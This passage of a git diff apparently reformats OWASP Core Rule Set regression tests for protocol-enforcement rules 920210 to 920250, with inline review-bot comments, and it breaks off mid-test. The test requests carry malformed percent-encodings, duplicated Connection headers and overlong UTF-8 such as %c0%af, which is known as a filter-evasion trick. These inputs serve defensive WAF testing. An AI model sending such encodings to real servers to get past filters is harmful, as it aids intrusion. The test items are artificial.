@@ -1,122 +1,121 @@ --- meta: author: "csanders-git, azurit" - enabled: true - name: "920210.yaml" description: "Tests that trigger rule 920210" +rule_id: 920210 tests: - - test_title: 920210-1 + - test_id: 1 stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Connection: "keep-alive" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/" - version: "HTTP/1.1" - output: - no_log_contains: "id \"920210\"" - - test_title: 920210-2 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Connection: "keep-alive" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/" + version: "HTTP/1.1" + output: + log: + no_expect_ids: [920210] + - test_id: 2 stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Connection: "keep-alive,keep-alive" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/" - version: "HTTP/1.1" - output: - log_contains: "id \"920210\"" - - test_title: 920210-3 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Connection: "keep-alive,keep-alive" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/" + version: "HTTP/1.1" + output: + log: + expect_ids: [920210] + - test_id: 3 stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Connection: "keep-alive,close" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/" - version: "HTTP/1.1" - output: - log_contains: "id 
\"920210\"" - - test_title: 920210-4 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Connection: "keep-alive,close" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/" + version: "HTTP/1.1" + output: + log: + expect_ids: [920210] + - test_id: 4 stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Connection: "close,close" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/" - version: "HTTP/1.1" - output: - log_contains: "id \"920210\"" - - test_title: 920210-5 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Connection: "close,close" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/" + version: "HTTP/1.1" + output: + log: + expect_ids: [920210] + - test_id: 5 stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Connection: "User-Agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/" - version: "HTTP/1.1" - output: - no_log_contains: "id \"920210\"" - - test_title: 920210-6 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Connection: "User-Agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/" + version: "HTTP/1.1" + output: + log: + no_expect_ids: [920210] + - test_id: 6 desc: Multiple/Conflicting Connection Header Data Found (920210) from old modsec regressions stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Language: en-us,en;q=0.5 - Connection: keep-alive, keep-alive - Host: localhost - Keep-Alive: '300' - Proxy-Connection: keep-alive - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/" - version: "HTTP/1.1" - output: - log_contains: id "920210" - - test_title: 920210-7 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Language: en-us,en;q=0.5 + Connection: keep-alive, keep-alive + Host: localhost + Keep-Alive: '300' + Proxy-Connection: keep-alive + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/" + version: "HTTP/1.1" + output: + log: + expect_ids: [920210] + - test_id: 7 desc: Multiple/Conflicting Connection Header Data Found (920210) from old modsec regressions stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Language: en-us,en;q=0.5 - Connection: close, close - Host: localhost - Keep-Alive: '300' - Proxy-Connection: keep-alive - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/" - version: "HTTP/1.1" - output: - log_contains: id "920210" + - input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Language: en-us,en;q=0.5 + Connection: close, close + Host: localhost + Keep-Alive: '300' + Proxy-Connection: keep-alive + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/" + version: "HTTP/1.1" + output: + log: + expect_ids: [920210] diff --git a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920220.yaml b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920220.yaml index 1ef7bba65..4f321727b 100644 
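Review bot: test_id 6 and test_id 7 in 920210.yaml now carry the identical `desc: Multiple/Conflicting Connection Header Data Found (920210) from old modsec regressions`, although one sends `Connection: keep-alive, keep-alive` and the other `Connection: close, close`; with `test_title` gone, `desc` is the only human-readable label left in the runner's report, so the two should be told apart, e.g. `desc: Duplicate keep-alive tokens in Connection header (920210, old modsec regressions)` and `desc: Duplicate close tokens in Connection header (920210, old modsec regressions)`. Test 5 (`Connection: "User-Agent"`, expected not to trigger) is the most instructive negative case in the file and would also benefit from a one-line `desc` noting that a Connection value naming a header field, rather than repeating a token, is accepted.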
--- a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920220.yaml +++ b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920220.yaml 
@@ -1,129 +1,128 @@ --- meta: author: "csanders-git, Max Leske, azurit" - enabled: true - name: "920220.yaml" description: "Detect invalid URI encoding in the request URI" +rule_id: 920220 tests: - - test_title: 920220-1 - description: Detect invalid URI encoding in decoded URI (`%w20`) + - test_id: 1 + desc: Detect invalid URI encoding in decoded URI (`%w20`) stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - uri: "/get?x=%25w20" - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - version: "HTTP/1.1" - output: - log_contains: "id \"920220\"" - - test_title: 920220-2 - description: Detect invalid URI encoding in decoded URI (`%1G`) + - input: + dest_addr: "127.0.0.1" + port: 80 + uri: "/get?x=%25w20" + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + version: "HTTP/1.1" + output: + log: + expect_ids: [920220] + - test_id: 2 + desc: Detect invalid URI encoding in decoded URI (`%1G`) stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - uri: "/get?x=%251G" - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - version: "HTTP/1.1" - output: - log_contains: "id \"920220\"" - - test_title: 920220-3 - description: Do not trigger for valid URI encoding in decoded URI (`xyz zyx`) + - input: + dest_addr: "127.0.0.1" + port: 80 + uri: "/get?x=%251G" + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + version: "HTTP/1.1" + output: + log: + expect_ids: [920220] + - test_id: 3 + desc: Do not trigger for valid URI encoding in decoded URI (`xyz zyx`) 
stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - uri: "get/?x=xyz%20zyx" - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - version: "HTTP/1.1" - output: - no_log_contains: "id \"920220\"" - - test_title: 920220-4 - description: Do not trigger for spaces encoded as `+`, which is valid + - input: + dest_addr: "127.0.0.1" + port: 80 + uri: "get/?x=xyz%20zyx" + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + version: "HTTP/1.1" + output: + log: + no_expect_ids: [920220] + - test_id: 4 + desc: Do not trigger for spaces encoded as `+`, which is valid stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - uri: "/get?test=This+is+a+test" - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - version: "HTTP/1.1" - output: - no_log_contains: "id \"920220\"" - - test_title: 920220-5 - description: | + - input: + dest_addr: "127.0.0.1" + port: 80 + uri: "/get?test=This+is+a+test" + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + version: "HTTP/1.1" + output: + log: + no_expect_ids: [920220] + - test_id: 5 + desc: | Detect incomplete URI encoding sequence (`bxy`, with crippled encoding of `b`). Note that the second character must not complete the `%6` to a valid sequence. 
stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - uri: "/get?parm=%6%78%79" - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - version: "HTTP/1.1" - output: - log_contains: "id \"920220\"" - - test_title: 920220-6 - description: Detect incomplete URI encoding sequence, single `%` (`bad%`) + - input: + dest_addr: "127.0.0.1" + port: 80 + uri: "/get?parm=%6%78%79" + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + version: "HTTP/1.1" + output: + log: + expect_ids: [920220] + - test_id: 6 + desc: Detect incomplete URI encoding sequence, single `%` (`bad%`) stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - uri: "/get?parm=%62%61%64%" - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - version: "HTTP/1.1" - output: - log_contains: "id \"920220\"" - - test_title: 920220-7 - description: Do not inspect file names for invalid URI encoding (`Taxes20%Done.txt`) + - input: + dest_addr: "127.0.0.1" + port: 80 + uri: "/get?parm=%62%61%64%" + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + version: "HTTP/1.1" + output: + log: + expect_ids: [920220] + - test_id: 7 + desc: Do not inspect file names for invalid URI encoding (`Taxes20%Done.txt`) stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - uri: "/get/Taxes20%25Done.txt" - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - version: "HTTP/1.1" - 
output: - no_log_contains: "id \"920220\"" - - test_title: 920220-8 - description: Do not inspect file names for invalid URI encoding (`Taxes20%Done.txt`), with query + - input: + dest_addr: "127.0.0.1" + port: 80 + uri: "/get/Taxes20%25Done.txt" + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + version: "HTTP/1.1" + output: + log: + no_expect_ids: [920220] + - test_id: 8 + desc: Do not inspect file names for invalid URI encoding (`Taxes20%Done.txt`), with query stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - uri: "/get/Taxes20%25Done.txt?x%20y" - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - version: "HTTP/1.1" - output: - no_log_contains: "id \"920220\"" + - input: + dest_addr: "127.0.0.1" + port: 80 + uri: "/get/Taxes20%25Done.txt?x%20y" + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + version: "HTTP/1.1" + output: + log: + no_expect_ids: [920220] diff --git a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920221.yaml b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920221.yaml index 54515ef4b..e6e2bf592 100644 --- a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920221.yaml +++ b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920221.yaml 
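Review bot: test_id 3 in 920220.yaml still sends `uri: "get/?x=xyz%20zyx"` without a leading slash, unlike every other stage in the file (`/get?x=%25w20`, `/get/Taxes20%25Done.txt`), and the commit carries that over unchanged. An origin-form request-target must start with `/`, so the web server is likely to reject the request before the rule set sees a meaningful URI, which would make this negative test pass vacuously instead of demonstrating that `xyz%20zyx` is accepted; it should read `uri: "/get?x=xyz%20zyx"`. I cannot tell from the diff what status the backend currently returns here, but adding `status: 200` next to `no_expect_ids` on the negative cases whose path the backend actually serves would catch a vacuous pass in future.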
@@ -1,37 +1,36 @@ --- meta: author: "Max Leske, azurit" - enabled: true - name: "920221.yaml" description: "Detect invalid URI encoding in the last path segment of the URI" +rule_id: 920221 tests: - - test_title: 920221-1 - description: Detect invalid URI encoding in decoded URI (`%w20`) + - test_id: 1 + desc: Detect invalid URI encoding in decoded URI (`%w20`) stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - uri: "/get/%25w20" - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - version: "HTTP/1.1" - output: - log_contains: "id \"920221\"" - - test_title: 920221-2 - description: Ignore invalid URI encoding if the last path segment looks like file name (`%w20`) + - input: + dest_addr: "127.0.0.1" + port: 80 + uri: "/get/%25w20" + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + version: "HTTP/1.1" + output: + log: + expect_ids: [920221] + - test_id: 2 + desc: Ignore invalid URI encoding if the last path segment looks like file name (`%w20`) stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - uri: "/get/%25w20.txt" - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - version: "HTTP/1.1" - output: - no_log_contains: "id \"920221\"" + - input: + dest_addr: "127.0.0.1" + port: 80 + uri: "/get/%25w20.txt" + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + version: "HTTP/1.1" + output: + log: + no_expect_ids: [920221] 
diff --git a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920230.yaml b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920230.yaml index 0c985df20..1eb6b6c52 100644 --- a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920230.yaml +++ b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920230.yaml 
@@ -1,43 +1,41 @@ --- meta: author: "csanders-git, azurit" - enabled: true - name: "920230.yaml" - description: "Description" +rule_id: 920230 tests: - # From old modsec regression tests - test_title: 920230-1 + test_id: 1 stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - uri: "/?parm=%25%37%33%25%36%46%25%36%44%25%36%35%25%37%34%25%36%35%25%37%38%25%37%34%25%35%46%25%33%31%25%33%32%25%33%33%25%33%34" - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Language: "en-us,en;q=0.5" - Keep-Alive: "300" - Proxy-Connection: "keep-alive" - version: "HTTP/1.1" - output: - log_contains: "id \"920230\"" + - input: + dest_addr: "127.0.0.1" + port: 80 + uri: "/?parm=%25%37%33%25%36%46%25%36%44%25%36%35%25%37%34%25%36%35%25%37%38%25%37%34%25%35%46%25%33%31%25%33%32%25%33%33%25%33%34" + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Language: "en-us,en;q=0.5" + Keep-Alive: "300" + Proxy-Connection: "keep-alive" + version: "HTTP/1.1" + output: + log: + expect_ids: [920230] - # From old modsec regression tests - test_title: 920230-2 + test_id: 2 stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - uri: "/?parm=%7%6F%6D%65%74%65%78%74%5F%31%32%33%" - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Language: "en-us,en;q=0.5" - Keep-Alive: "300" - Proxy-Connection: "keep-alive" - version: "HTTP/1.1" - output: - no_log_contains: "id \"920230\"" + - input: + dest_addr: "127.0.0.1" + port: 80 + uri: "/?parm=%7%6F%6D%65%74%65%78%74%5F%31%32%33%" + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Language: "en-us,en;q=0.5" + Keep-Alive: "300" + Proxy-Connection: "keep-alive" + version: "HTTP/1.1" + output: + log: + no_expect_ids: [920230] diff --git a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920240.yaml b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920240.yaml index 9661f48a0..3cea2441c 100644 --- a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920240.yaml +++ b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920240.yaml 
@@ -1,135 +1,133 @@ --- meta: author: "csanders-git, azurit" - enabled: true - name: "920240.yaml" - description: "Description" +rule_id: 920240 tests: - - test_title: 920240-1 + - test_id: 1 stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - method: "POST" - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Content-Type: "application/x-www-form-urlencoded" - Content-Length: 11 - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/" - data: "x=new %w20$" - stop_magic: true - version: "HTTP/1.1" - output: - log_contains: "id \"920240\"" - - test_title: 920240-2 + - input: + dest_addr: "127.0.0.1" + port: 80 + method: "POST" + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Content-Type: "application/x-www-form-urlencoded" + Content-Length: 11 + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/" + data: "x=new %w20$" + autocomplete_headers: false + version: "HTTP/1.1" + output: + log: + expect_ids: [920240] + - test_id: 2 stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - method: "POST" - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Content-Type: "application/x-www-form-urlencoded" - Content-Length: 10 - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/" - data: "x=new %20$" - stop_magic: true - version: "HTTP/1.1" - output: - no_log_contains: "id \"920240\"" - - test_title: 920240-3 + - input: + dest_addr: "127.0.0.1" + port: 80 + method: "POST" + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Content-Type: "application/x-www-form-urlencoded" + Content-Length: 10 + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/" + data: "x=new %20$" + autocomplete_headers: false + version: "HTTP/1.1" + 
output: + log: + no_expect_ids: [920240] + - test_id: 3 stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - method: "POST" - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Content-Type: "application/x-www-form-urlencoded" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/" - data: "param=value" - version: "HTTP/1.1" - output: - no_log_contains: "id \"920240\"" + - input: + dest_addr: "127.0.0.1" + port: 80 + method: "POST" + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Content-Type: "application/x-www-form-urlencoded" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/" + data: "param=value" + version: "HTTP/1.1" + output: + log: + no_expect_ids: [920240] - # We have a valid percent encoding here - test_title: 920240-4 + test_id: 4 stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - method: "POST" - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Language: "en-us,en;q=0.5" - Keep-Alive: "300" - Proxy-Connection: "keep-alive" - Content-Type: "text/xml" - uri: "/" - data: | - - - - http://www.w3.org/2002/03/xkms#Pending - %1Gwww.attack.org - - - - version: "HTTP/1.1" - output: - no_log_contains: "id \"920240\"" + - input: + dest_addr: "127.0.0.1" + port: 80 + method: "POST" + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Language: "en-us,en;q=0.5" + Keep-Alive: "300" + Proxy-Connection: "keep-alive" + Content-Type: "text/xml" + uri: "/" + data: | + + + + http://www.w3.org/2002/03/xkms#Pending + %1Gwww.attack.org + + + + version: "HTTP/1.1" + output: + log: + no_expect_ids: [920240] - # 
test URL Encoding Abuse Attack Attempt from old regression tests - test_title: 920240-5 + test_id: 5 stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - method: "POST" - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Language: "en-us,en;q=0.5" - Keep-Alive: "300" - Proxy-Connection: "keep-alive" - Content-Type: "application/x-www-form-urlencoded" - Content-Length: "9" - uri: "/" - data: "param=%1G" - stop_magic: true - version: "HTTP/1.1" - output: - log_contains: "id \"920240\"" + - input: + dest_addr: "127.0.0.1" + port: 80 + method: "POST" + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Language: "en-us,en;q=0.5" + Keep-Alive: "300" + Proxy-Connection: "keep-alive" + Content-Type: "application/x-www-form-urlencoded" + Content-Length: "9" + uri: "/" + data: "param=%1G" + autocomplete_headers: false + version: "HTTP/1.1" + output: + log: + expect_ids: [920240] - # test URL Encoding Abuse Attack Attempt from old regression tests - test_title: 920240-6 + test_id: 6 stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - method: "POST" - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Language: "en-us,en;q=0.5" - Keep-Alive: "300" - Proxy-Connection: "keep-alive" - Content-Type: "application/x-www-form-urlencoded" - uri: "/" - data: "param=%7%6F%6D%65%74%65%78%74%5F%31%32%33%" - version: "HTTP/1.1" - output: - log_contains: "id \"920240\"" + - input: + dest_addr: "127.0.0.1" + port: 80 + method: "POST" + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Language: "en-us,en;q=0.5" + Keep-Alive: "300" + Proxy-Connection: "keep-alive" + Content-Type: "application/x-www-form-urlencoded" + uri: "/" + data: "param=%7%6F%6D%65%74%65%78%74%5F%31%32%33%" + version: "HTTP/1.1" + output: + log: + expect_ids: [920240] diff --git a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920250.yaml b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920250.yaml index 0f75ddbc8..ebfc6cc54 100644 --- a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920250.yaml +++ b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920250.yaml 
@@ -1,80 +1,78 @@ --- meta: author: "csanders-git, azurit" - enabled: true - name: "920250.yaml" - description: "Description" +rule_id: 920250 tests: - # crs-setup.conf needs to have CRS_VALIDATE_UTF8_ENCODING set # Taken from existing modsec regression - test_title: 920250-1 + test_id: 1 stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - uri: "/?param=%c0%af" - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Language: "en-us,en;q=0.5" - Keep-Alive: "300" - Proxy-Connection: "keep-alive" - version: "HTTP/1.1" - output: - log_contains: "id \"920250\"" + - input: + dest_addr: "127.0.0.1" + port: 80 + uri: "/?param=%c0%af" + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Language: "en-us,en;q=0.5" + Keep-Alive: "300" + Proxy-Connection: "keep-alive" + version: "HTTP/1.1" + output: + log: + expect_ids: [920250] - # Taken from existing modsec regression - test_title: 920250-2 + test_id: 2 stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - uri: "/?param=%c0" - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Language: "en-us,en;q=0.5" - Keep-Alive: "300" - Proxy-Connection: "keep-alive" - version: "HTTP/1.1" - output: - log_contains: "id \"920250\"" + - input: + dest_addr: "127.0.0.1" + port: 80 + uri: "/?param=%c0" + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Language: "en-us,en;q=0.5" + Keep-Alive: "300" + Proxy-Connection: "keep-alive" + version: "HTTP/1.1" + output: + log: + expect_ids: 
[920250] - # Taken from existing modsec regression - test_title: 920250-3 + test_id: 3 stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - uri: "/?param=%F5%80%BF%BF" - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Language: "en-us,en;q=0.5" - Keep-Alive: "300" - Proxy-Connection: "keep-alive" - version: "HTTP/1.1" - output: - log_contains: "id \"920250\"" - - test_title: 920250-4 + - input: + dest_addr: "127.0.0.1" + port: 80 + uri: "/?param=%F5%80%BF%BF" + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Language: "en-us,en;q=0.5" + Keep-Alive: "300" + Proxy-Connection: "keep-alive" + version: "HTTP/1.1" + output: + log: + expect_ids: [920250] + - test_id: 4 desc: "Status Page Test - Invalid UTF-8 encoding: %C2%A3 is a valid Pound sign; %E2%A3 is invalid UTF-8 (incorrect starting binary sequence)" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - uri: "/?param=%E2%A3" - headers: - User-Agent: "OWASP CRS test 